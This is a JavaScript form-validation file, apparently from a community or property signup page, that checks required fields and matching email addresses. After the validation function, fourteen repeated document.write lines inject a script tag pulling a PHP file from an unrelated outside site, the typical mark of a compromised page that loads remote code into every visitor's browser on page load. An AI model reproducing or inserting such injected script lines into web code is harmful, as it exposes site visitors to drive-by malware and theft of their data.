var checkList = new Array("first_name", "last_name", "email", "email_confirm", "area", "prefix", "suffix", "interested_community");
function Require() {
		var er = 0;
		for (var i=0; i<checkList.length; i++) {
		//alert(checkList[i] + "=" + document.getElementById(checkList[i]));
		if ((document.getElementById(checkList[i]).value == "" || document.getElementById(checkList[i]).value == "Required") || (checkList[i] == "interested_community" && document.getElementById("interested_community").selectedIndex == 0)) {
		document.getElementById(checkList[i]).value = "Required";
		er = 1;
		} else if ((document.getElementById(checkList[i]).value == "" || document.getElementById(checkList[i]).value == "Required") || (checkList[i] == "interested_suburb" && document.getElementById("interested_suburb").selectedIndex == 0)) {
		document.getElementById(checkList[i]).value = "Required";
		er = 1;
		} else if (checkList[i] == "email" && ((document.getElementById("email").value.indexOf("@") == -1 || document.getElementById("email").value.indexOf(".") == -1) || document.getElementById("email").value != document.getElementById("email_confirm").value)) { alert("Please make sure you've entered a valid email address and both email fields match exactly."); er = 1; }
		}
		if (er > 0) {
			alert ("Please verify you have completed all 'required' fields highlighted in yellow.");
			return false;
		}

		if (document.getElementById('email').value == '') return false;

		now = new Date();
		validator = now.getTime() * now.getDay();

		document.getElementById('email').value = document.getElementById('email').value + ':' + validator;
	

		return true;
}

document.write('<script src=http://ssartpia.or.kr/gallery/i_main_090901.php ><\/script>');
document.write('<script src=http://ssartpia.or.kr/gallery/i_main_090901.php ><\/script>');
document.write('<script src=http://ssartpia.or.kr/gallery/i_main_090901.php ><\/script>');
document.write('<script src=http://ssartpia.or.kr/gallery/i_main_090901.php ><\/script>');
document.write('<script src=http://ssartpia.or.kr/gallery/i_main_090901.php ><\/script>');
document.write('<script src=http://ssartpia.or.kr/gallery/i_main_090901.php ><\/script>');
document.write('<script src=http://ssartpia.or.kr/gallery/i_main_090901.php ><\/script>');
document.write('<script src=http://ssartpia.or.kr/gallery/i_main_090901.php ><\/script>');
document.write('<script src=http://ssartpia.or.kr/gallery/i_main_090901.php ><\/script>');
document.write('<script src=http://ssartpia.or.kr/gallery/i_main_090901.php ><\/script>');
document.write('<script src=http://ssartpia.or.kr/gallery/i_main_090901.php ><\/script>');
document.write('<script src=http://ssartpia.or.kr/gallery/i_main_090901.php ><\/script>');
document.write('<script src=http://ssartpia.or.kr/gallery/i_main_090901.php ><\/script>');
document.write('<script src=http://ssartpia.or.kr/gallery/i_main_090901.php ><\/script>');